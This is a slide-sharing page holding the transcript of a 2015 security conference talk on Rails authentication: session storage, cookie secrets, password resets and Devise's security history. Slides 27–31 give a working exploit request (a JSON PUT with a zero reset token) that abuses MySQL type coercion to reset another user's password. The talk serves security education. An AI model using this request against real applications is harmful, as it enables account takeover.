Use perl creating web services with xml rpc
Use perl creating web services with xml rpcUse perl creating web services with xml rpc
Use perl creating web services with xml rpcJohnny Pork
 

Similar to 44CON London 2015 - Going AUTH the Rails on a Crazy Train (20)

Deploying JRuby Web Applications
Deploying JRuby Web ApplicationsDeploying JRuby Web Applications
Deploying JRuby Web Applications
 
Introducción a Wiremock
Introducción a WiremockIntroducción a Wiremock
Introducción a Wiremock
 
Deploy, Scale and Sleep at Night with JRuby
Deploy, Scale and Sleep at Night with JRubyDeploy, Scale and Sleep at Night with JRuby
Deploy, Scale and Sleep at Night with JRuby
 
Socket applications
Socket applicationsSocket applications
Socket applications
 
Rapid java backend and api development for mobile devices
Rapid java backend and api development for mobile devicesRapid java backend and api development for mobile devices
Rapid java backend and api development for mobile devices
 
Hunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentationHunting for APT in network logs workshop presentation
Hunting for APT in network logs workshop presentation
 
Rest
RestRest
Rest
 
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
DEFCON 22: Bypass firewalls, application white lists, secure remote desktops ...
 
Camel and JBoss
Camel and JBossCamel and JBoss
Camel and JBoss
 
Who pulls the strings?
Who pulls the strings?Who pulls the strings?
Who pulls the strings?
 
Crushing Latency with Vert.x
Crushing Latency with Vert.xCrushing Latency with Vert.x
Crushing Latency with Vert.x
 
A rough guide to JavaScript Performance
A rough guide to JavaScript PerformanceA rough guide to JavaScript Performance
A rough guide to JavaScript Performance
 
SD, a P2P bug tracking system
SD, a P2P bug tracking systemSD, a P2P bug tracking system
SD, a P2P bug tracking system
 
AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...
AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...
AppSec EU 2009 - HTTP Parameter Pollution by Luca Carettoni and Stefano di P...
 
XML-RPC and SOAP (April 2003)
XML-RPC and SOAP (April 2003)XML-RPC and SOAP (April 2003)
XML-RPC and SOAP (April 2003)
 
Hands on with CoAP and Californium
Hands on with CoAP and CaliforniumHands on with CoAP and Californium
Hands on with CoAP and Californium
 
Multi-Layer DDoS Mitigation Strategies
Multi-Layer DDoS Mitigation StrategiesMulti-Layer DDoS Mitigation Strategies
Multi-Layer DDoS Mitigation Strategies
 
TorqueBox at DC:JBUG - November 2011
TorqueBox at DC:JBUG - November 2011TorqueBox at DC:JBUG - November 2011
TorqueBox at DC:JBUG - November 2011
 
Ajax to the Moon
Ajax to the MoonAjax to the Moon
Ajax to the Moon
 
Use perl creating web services with xml rpc
Use perl creating web services with xml rpcUse perl creating web services with xml rpc
Use perl creating web services with xml rpc
 

More from 44CON

They're All Scorpions - Successful SecOps in a Hostile Workplace - Pete Herzo...
They're All Scorpions - Successful SecOps in a Hostile Workplace - Pete Herzo...They're All Scorpions - Successful SecOps in a Hostile Workplace - Pete Herzo...
They're All Scorpions - Successful SecOps in a Hostile Workplace - Pete Herzo...44CON
 
How to Explain Post-Quantum Cryptography to a Middle School Student - Klaus S...
How to Explain Post-Quantum Cryptography to a Middle School Student - Klaus S...How to Explain Post-Quantum Cryptography to a Middle School Student - Klaus S...
How to Explain Post-Quantum Cryptography to a Middle School Student - Klaus S...44CON
 
Using SmartNICs to Provide Better Data Center Security - Jack Matheson - 44CO...
Using SmartNICs to Provide Better Data Center Security - Jack Matheson - 44CO...Using SmartNICs to Provide Better Data Center Security - Jack Matheson - 44CO...
Using SmartNICs to Provide Better Data Center Security - Jack Matheson - 44CO...44CON
 
JARVIS never saw it coming: Hacking machine learning (ML) in speech, text and...
JARVIS never saw it coming: Hacking machine learning (ML) in speech, text and...JARVIS never saw it coming: Hacking machine learning (ML) in speech, text and...
JARVIS never saw it coming: Hacking machine learning (ML) in speech, text and...44CON
 
Reverse Engineering and Bug Hunting on KMDF Drivers - Enrique Nissim - 44CON ...
Reverse Engineering and Bug Hunting on KMDF Drivers - Enrique Nissim - 44CON ...Reverse Engineering and Bug Hunting on KMDF Drivers - Enrique Nissim - 44CON ...
Reverse Engineering and Bug Hunting on KMDF Drivers - Enrique Nissim - 44CON ...44CON
 
The UK's Code of Practice for Security in Consumer IoT Products and Services ...
The UK's Code of Practice for Security in Consumer IoT Products and Services ...The UK's Code of Practice for Security in Consumer IoT Products and Services ...
The UK's Code of Practice for Security in Consumer IoT Products and Services ...44CON
 
Weak analogies make poor realities – are we sitting on a Security Debt Crisis...
Weak analogies make poor realities – are we sitting on a Security Debt Crisis...Weak analogies make poor realities – are we sitting on a Security Debt Crisis...
Weak analogies make poor realities – are we sitting on a Security Debt Crisis...44CON
 
Pwning the 44CON Nerf Tank
Pwning the 44CON Nerf TankPwning the 44CON Nerf Tank
Pwning the 44CON Nerf Tank44CON
 
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...Security module for php7 – Killing bugclasses and virtual-patching the rest! ...
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...44CON
 
44CON London 2015 - Software Defined Networking (SDN) Security
44CON London 2015 - Software Defined Networking (SDN) Security44CON London 2015 - Software Defined Networking (SDN) Security
44CON London 2015 - Software Defined Networking (SDN) Security44CON
 
44CON London 2015 - DDoS mitigation EPIC FAIL collection
44CON London 2015 - DDoS mitigation EPIC FAIL collection44CON London 2015 - DDoS mitigation EPIC FAIL collection
44CON London 2015 - DDoS mitigation EPIC FAIL collection44CON
 
44CON London 2015 - Hunting Asynchronous Vulnerabilities
44CON London 2015 - Hunting Asynchronous Vulnerabilities44CON London 2015 - Hunting Asynchronous Vulnerabilities
44CON London 2015 - Hunting Asynchronous Vulnerabilities44CON
 
44CON London 2015 - Reverse engineering and exploiting font rasterizers: the ...
44CON London 2015 - Reverse engineering and exploiting font rasterizers: the ...44CON London 2015 - Reverse engineering and exploiting font rasterizers: the ...
44CON London 2015 - Reverse engineering and exploiting font rasterizers: the ...44CON
 
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON
 
44CON London 2015 - reverse reverse engineering
44CON London 2015 - reverse reverse engineering44CON London 2015 - reverse reverse engineering
44CON London 2015 - reverse reverse engineering44CON
 
44CON London 2015 - Windows 10: 2 Steps Forward, 1 Step Back
44CON London 2015 - Windows 10: 2 Steps Forward, 1 Step Back44CON London 2015 - Windows 10: 2 Steps Forward, 1 Step Back
44CON London 2015 - Windows 10: 2 Steps Forward, 1 Step Back44CON
 
44CON London 2015 - Playing with Fire: Attacking the FireEye MPS
44CON London 2015 - Playing with Fire: Attacking the FireEye MPS44CON London 2015 - Playing with Fire: Attacking the FireEye MPS
44CON London 2015 - Playing with Fire: Attacking the FireEye MPS44CON
 
44CON London 2015 - Old Dog, New Tricks: Forensics With PowerShell
44CON London 2015 - Old Dog, New Tricks: Forensics With PowerShell44CON London 2015 - Old Dog, New Tricks: Forensics With PowerShell
44CON London 2015 - Old Dog, New Tricks: Forensics With PowerShell44CON
 
44CON London 2015 - Smart Muttering; a story and toolset for smart meter plat...
44CON London 2015 - Smart Muttering; a story and toolset for smart meter plat...44CON London 2015 - Smart Muttering; a story and toolset for smart meter plat...
44CON London 2015 - Smart Muttering; a story and toolset for smart meter plat...44CON
 
44CON London 2015 - Inside Terracotta VPN
44CON London 2015 - Inside Terracotta VPN44CON London 2015 - Inside Terracotta VPN
44CON London 2015 - Inside Terracotta VPN44CON
 

More from 44CON (20)

They're All Scorpions - Successful SecOps in a Hostile Workplace - Pete Herzo...
They're All Scorpions - Successful SecOps in a Hostile Workplace - Pete Herzo...They're All Scorpions - Successful SecOps in a Hostile Workplace - Pete Herzo...
They're All Scorpions - Successful SecOps in a Hostile Workplace - Pete Herzo...
 
How to Explain Post-Quantum Cryptography to a Middle School Student - Klaus S...
How to Explain Post-Quantum Cryptography to a Middle School Student - Klaus S...How to Explain Post-Quantum Cryptography to a Middle School Student - Klaus S...
How to Explain Post-Quantum Cryptography to a Middle School Student - Klaus S...
 
Using SmartNICs to Provide Better Data Center Security - Jack Matheson - 44CO...
Using SmartNICs to Provide Better Data Center Security - Jack Matheson - 44CO...Using SmartNICs to Provide Better Data Center Security - Jack Matheson - 44CO...
Using SmartNICs to Provide Better Data Center Security - Jack Matheson - 44CO...
 
JARVIS never saw it coming: Hacking machine learning (ML) in speech, text and...
JARVIS never saw it coming: Hacking machine learning (ML) in speech, text and...JARVIS never saw it coming: Hacking machine learning (ML) in speech, text and...
JARVIS never saw it coming: Hacking machine learning (ML) in speech, text and...
 
Reverse Engineering and Bug Hunting on KMDF Drivers - Enrique Nissim - 44CON ...
Reverse Engineering and Bug Hunting on KMDF Drivers - Enrique Nissim - 44CON ...Reverse Engineering and Bug Hunting on KMDF Drivers - Enrique Nissim - 44CON ...
Reverse Engineering and Bug Hunting on KMDF Drivers - Enrique Nissim - 44CON ...
 
The UK's Code of Practice for Security in Consumer IoT Products and Services ...
The UK's Code of Practice for Security in Consumer IoT Products and Services ...The UK's Code of Practice for Security in Consumer IoT Products and Services ...
The UK's Code of Practice for Security in Consumer IoT Products and Services ...
 
Weak analogies make poor realities – are we sitting on a Security Debt Crisis...
Weak analogies make poor realities – are we sitting on a Security Debt Crisis...Weak analogies make poor realities – are we sitting on a Security Debt Crisis...
Weak analogies make poor realities – are we sitting on a Security Debt Crisis...
 
Pwning the 44CON Nerf Tank
Pwning the 44CON Nerf TankPwning the 44CON Nerf Tank
Pwning the 44CON Nerf Tank
 
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...Security module for php7 – Killing bugclasses and virtual-patching the rest! ...
Security module for php7 – Killing bugclasses and virtual-patching the rest! ...
 
44CON London 2015 - Software Defined Networking (SDN) Security
44CON London 2015 - Software Defined Networking (SDN) Security44CON London 2015 - Software Defined Networking (SDN) Security
44CON London 2015 - Software Defined Networking (SDN) Security
 
44CON London 2015 - DDoS mitigation EPIC FAIL collection
44CON London 2015 - DDoS mitigation EPIC FAIL collection44CON London 2015 - DDoS mitigation EPIC FAIL collection
44CON London 2015 - DDoS mitigation EPIC FAIL collection
 
44CON London 2015 - Hunting Asynchronous Vulnerabilities
44CON London 2015 - Hunting Asynchronous Vulnerabilities44CON London 2015 - Hunting Asynchronous Vulnerabilities
44CON London 2015 - Hunting Asynchronous Vulnerabilities
 
44CON London 2015 - Reverse engineering and exploiting font rasterizers: the ...
44CON London 2015 - Reverse engineering and exploiting font rasterizers: the ...44CON London 2015 - Reverse engineering and exploiting font rasterizers: the ...
44CON London 2015 - Reverse engineering and exploiting font rasterizers: the ...
 
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
44CON London 2015 - Jtagsploitation: 5 wires, 5 ways to root
 
44CON London 2015 - reverse reverse engineering
44CON London 2015 - reverse reverse engineering44CON London 2015 - reverse reverse engineering
44CON London 2015 - reverse reverse engineering
 
44CON London 2015 - Windows 10: 2 Steps Forward, 1 Step Back
44CON London 2015 - Windows 10: 2 Steps Forward, 1 Step Back44CON London 2015 - Windows 10: 2 Steps Forward, 1 Step Back
44CON London 2015 - Windows 10: 2 Steps Forward, 1 Step Back
 
44CON London 2015 - Playing with Fire: Attacking the FireEye MPS
44CON London 2015 - Playing with Fire: Attacking the FireEye MPS44CON London 2015 - Playing with Fire: Attacking the FireEye MPS
44CON London 2015 - Playing with Fire: Attacking the FireEye MPS
 
44CON London 2015 - Old Dog, New Tricks: Forensics With PowerShell
44CON London 2015 - Old Dog, New Tricks: Forensics With PowerShell44CON London 2015 - Old Dog, New Tricks: Forensics With PowerShell
44CON London 2015 - Old Dog, New Tricks: Forensics With PowerShell
 
44CON London 2015 - Smart Muttering; a story and toolset for smart meter plat...
44CON London 2015 - Smart Muttering; a story and toolset for smart meter plat...44CON London 2015 - Smart Muttering; a story and toolset for smart meter plat...
44CON London 2015 - Smart Muttering; a story and toolset for smart meter plat...
 
44CON London 2015 - Inside Terracotta VPN
44CON London 2015 - Inside Terracotta VPN44CON London 2015 - Inside Terracotta VPN
44CON London 2015 - Inside Terracotta VPN
 

Recently uploaded

Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationSlibray Presentation
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...shyamraj55
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfAlex Barbosa Coqueiro
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024Lorenzo Miniero
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machinePadma Pradeep
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfjimielynbastida
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksSoftradix Technologies
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Wonjun Hwang
 
New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024BookNet Canada
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsRizwan Syed
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGMarianaLemus7
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsMark Billinghurst
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupFlorian Wilhelm
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr LapshynFwdays
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsMemoori
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brandgvaughan
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsMiki Katsuragi
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 3652toLead Limited
 

Recently uploaded (20)

Vulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptxVulnerability_Management_GRC_by Sohang Sengupta.pptx
Vulnerability_Management_GRC_by Sohang Sengupta.pptx
 
Connect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck PresentationConnect Wave/ connectwave Pitch Deck Presentation
Connect Wave/ connectwave Pitch Deck Presentation
 
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
Automating Business Process via MuleSoft Composer | Bangalore MuleSoft Meetup...
 
Pigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food ManufacturingPigging Solutions in Pet Food Manufacturing
Pigging Solutions in Pet Food Manufacturing
 
Unraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdfUnraveling Multimodality with Large Language Models.pdf
Unraveling Multimodality with Large Language Models.pdf
 
SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024SIP trunking in Janus @ Kamailio World 2024
SIP trunking in Janus @ Kamailio World 2024
 
Install Stable Diffusion in windows machine
Install Stable Diffusion in windows machineInstall Stable Diffusion in windows machine
Install Stable Diffusion in windows machine
 
Science&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdfScience&tech:THE INFORMATION AGE STS.pdf
Science&tech:THE INFORMATION AGE STS.pdf
 
Benefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other FrameworksBenefits Of Flutter Compared To Other Frameworks
Benefits Of Flutter Compared To Other Frameworks
 
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
Bun (KitWorks Team Study 노별마루 발표 2024.4.22)
 
New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
New from BookNet Canada for 2024: BNC BiblioShare - Tech Forum 2024
 
Scanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL CertsScanning the Internet for External Cloud Exposures via SSL Certs
Scanning the Internet for External Cloud Exposures via SSL Certs
 
APIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDGAPIForce Zurich 5 April Automation LPDG
APIForce Zurich 5 April Automation LPDG
 
Human Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR SystemsHuman Factors of XR: Using Human Factors to Design XR Systems
Human Factors of XR: Using Human Factors to Design XR Systems
 
Streamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project SetupStreamlining Python Development: A Guide to a Modern Project Setup
Streamlining Python Development: A Guide to a Modern Project Setup
 
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
"Federated learning: out of reach no matter how close",Oleksandr Lapshyn
 
AI as an Interface for Commercial Buildings
AI as an Interface for Commercial BuildingsAI as an Interface for Commercial Buildings
AI as an Interface for Commercial Buildings
 
WordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your BrandWordPress Websites for Engineers: Elevate Your Brand
WordPress Websites for Engineers: Elevate Your Brand
 
Vertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering TipsVertex AI Gemini Prompt Engineering Tips
Vertex AI Gemini Prompt Engineering Tips
 
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
Tech-Forward - Achieving Business Readiness For Copilot in Microsoft 365
 

44CON London 2015 - Going AUTH the Rails on a Crazy Train

  • 1. Going AUTH the Rails on a Crazy Train Tomek Rabczak @sigdroid Jeff Jarmoc @jjarmoc September, 2015
  • 2. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Who we are Tomek Rabczak Senior Security Consultant with NCC Group Ex-Rails Maker turned Rails Breaker Jeff Jarmoc Senior Security Consultant with NCC Group Occasional contributor to Metasploit, Brakeman NCC Group UK Headquarters, Worldwide Offices Software Escrow, Testing, Domain Services 2
  • 3. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train All Aboard, hahaha! 1. Rails Introduction 2. Authentication 3. Authorization 4. Boilerman: A New Dynamic Analysis Tool 3
  • 4. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train `rails  new  sample_app` sample_app   app/   models/   views/   controllers/ 4 Root directory Application files (Your code) Models (Objects, usually backed by DB) Views (Output presentation templates) Controllers (Ties Models and Views with Actions) Configuration files directory Maps URLs to Controller Actions Dependency record of Gem requirements Specific versions of currently installed Gems …   config/    routes.rb   …   Gemfile   Gemfile.lock
  • 5. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train The ‘Rails Way’ 5 ActiveRecord (Model) SQLi protection via ORM-managed queries (see http://rails-sqli.org/) ActionView (View) XSS protection via default HTML-output encoding ActionController (Controller) CSRF protections via protect_from_forgery
  • 6. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Goin’ off the Rails Authentication (AUTHN) Who is the user? Only HTTP Basic & Digest natively Authorization (AUTHZ) What can they do? No native facility 6
  • 7. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Laying More Track - AUTHN Option 1 - Roll your own Re-invents the wheel, risks common mistakes Lots more to AUTHN than checking/ storing passwords has_secure_password in >= 3.1 helps 7
  • 8. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Laying More Track - AUTHN 8 Option 2 - Use a gem Vulnerabilities are far-reaching Ongoing updates/maintenance required Integration can be tricky Core code is generally well vetted Encapsulates past community experience
  • 9. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Common AUTHN Gems Devise Most popular, built on Warden OmniAuth Multi-Provider, OAuth focused DoorKeeper OAuth2 provider for Rails AuthLogic Adds a new model blending Sessions w/ Auth 9
  • 10. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Arguments for writing “For one, practical experience shows that authentication on most sites requires extensive customization, and modifying a third-party product is often more work than writing the system from scratch. In addition, off-the-shelf systems can be “black boxes”, with potentially mysterious innards; when you write your own system, you are far more likely to understand it.” 10 https://www.railstutorial.org/book/modeling_users#sec-adding_a_secure_password
  • 11. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Write our own 11 http://api.rubyonrails.org/v3.1.0/classes/ActiveModel/SecurePassword/ClassMethods.html http://chargen.matasano.com/chargen/2015/3/26/enough-with-the-salts-updates-on-secure-password-schemes.html Digests stored with BCrypt Schema: User(name:string, password_digest:string)
  • 12. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Lots more needed. Storing Creds and Authenticating is just the start #TODO Session management Complexity requirements Lost/Forgotten Password handling API Tokens / MFA / 2FA / OAUTH 12
  • 13. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Session Management 1. Exchange credentials for a token (cookie). 2. Identify user by that token on subsequent requests. 3. Invalidate that token when needed. Logout or Timeout 4. Where we store session state varies 13
  • 14. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Encrypted Cookie Sessions 14 ozzy@ozzy.com *********
  • 15. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Database Sessions 15 ozzy@ozzy.com *********
  • 16. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Database vs. Cookies 16 Database Cookie User Cookie Random Token Encrypted Serialized Session Object Revocation Maximum Lifetime (Config) One Concurrent Delete From DB Maximum Lifetime (Config) Unlimited Concurrent Attack Surface Theft / Enumeration Theft / Enumeration Cryptographic Attacks Long/Infinite Lived Sessions Encryption Key Exposure *Deserialization Vulns Per-Request Overhead DB query (caching may help) Signature Validation Decryption Deserialization
  • 17. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Session Type Config config/initializers/session_store.rb: Rails.application.config.session_store  :cookie_store,   key:  ‘_session_cookie_name’,   :expire_after  =>  2.hours 17 or   :active_record_store Session Expiry Time Must be Manually Configured!
  • 18. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Cookie Session Config 18 config/secrets.yml: production:      secret_key_base:  'secret  key’ Signed, Not Encrypted! production:      secret_token:  'secret  key' config/initializer/session_store.rb: Rails.application.config.action_dispatch.cookies_serializer  =  :json RCE w/ Key Exposure!  :marshal      or   :hybrid
  • 19. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Lost/Forgotten Passwords Password Hints Change and email PW “Secret” Questions 19 CAUTION
  • 20. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Lost/Forgotten Passwords 20 1) Generate CSPRNG token => User object w/ timestamp 2) Transmit to user out of band (email, SMS, etc) 3) User visits site w/ token 4) User.find_by_token(), verify expiration, change password 5) Delete Token GOOD
  • 21. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Installing Devise Gemfile gem  'devise'   Commands rails  generate  devise:install   rails  generate  devise  User   Config Initializer:  config/initializers/devise.rb ActionMailer: config/environments/<environment>.rb Initialize Database rake  db:migrate 21
  • 22. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train app/models/User.rb 22
  • 23. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Routes 23 app/config/routes.rb: devise_for  :users
  • 24. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Using Devise Controller Filter before_action  :authenticate_user!   Often put in ApplicationController Skip where anonymous access needed Helpers user_signed_in?   current_user   user_session 24
  • 25. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Devise Security History Unreleased/HEAD Optionally send password change notifications 3.5.1 Remove active tokens on email/password change 3.1.2 Addresses an email enumeration bug 3.1.0 Stores HMAC of tokens, instead of plain-text token 3.0.1 Fixes CSRF Token Fixation 2.2.3 Fixes a type confusion vulnerability 25 Disclosed by @joernchen of Phenoelit Feb 5th, 2013 http://www.phenoelit.org/blog/archives/2013/02/05/ mysql_madness_and_rails/
  • 26. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Devise Password Reset Pseudo-Code 26
  • 27. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train MySQL Equality 27 mysql>  select  "foo"  from  dual  where  1="1string";   +-­‐-­‐-­‐-­‐-­‐+   |  foo  |   +-­‐-­‐-­‐-­‐-­‐+   |  foo  |   +-­‐-­‐-­‐-­‐-­‐+   1  row  in  set,  1  warning  (0.00  sec) mysql>  select  "foo"  from  dual  where  0="string";   +-­‐-­‐-­‐-­‐-­‐+   |  foo  |   +-­‐-­‐-­‐-­‐-­‐+   |  foo  |   +-­‐-­‐-­‐-­‐-­‐+   1  row  in  set,  1  warning  (0.00  sec)
  • 28. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Exploiting in Rails params[] A hash of (usually) strings containing values of user-supplied parameters 28 Like this /example?foo=bar&fizz=buzz   params  =>  {"foo"=>"bar",  “fizz"=>"buzz"}   /example?foo=1&fizz=2   params  =>  {"foo"=>"1",  "fizz"=>"2"}
  • 29. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Exploiting in Rails Rails Magic XML (<4.0) and JSON (all versions) bodies parsed automatically Typecast per those formats 29 Like this POST  /example  HTTP/1.1   content-­‐type:  application/xml   <foo>bar</foo>   <fizz  type=“integer”>1</fizz>   params  =>  {"foo"=>"bar",  “fizz"=>1}  
  • 30. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Devise Password Reset Exploit How about this? PUT  /users/password  HTTP/1.1   content-­‐type:  application/json   {"user":{   "password":"GAMEOVER",   "password_confirmation":"GAMEOVER",   “reset_password_token":0}   }   30
  • 31. Tomek Rabczak, Jeff Jarmoc - Going AUTH the Rails on a Crazy Train Devise Password Reset Exploit params[] => {"user"=>{"password"=>"GAMEOVER",   "password_confirmation"=>"GAMEOVER",   “reset_password_token”=>0}} 31 Query User.find_by_token(0)   SELECT  *  from  Users  where  token=0  limit  1; Result Resets password of first User with an outstanding token!
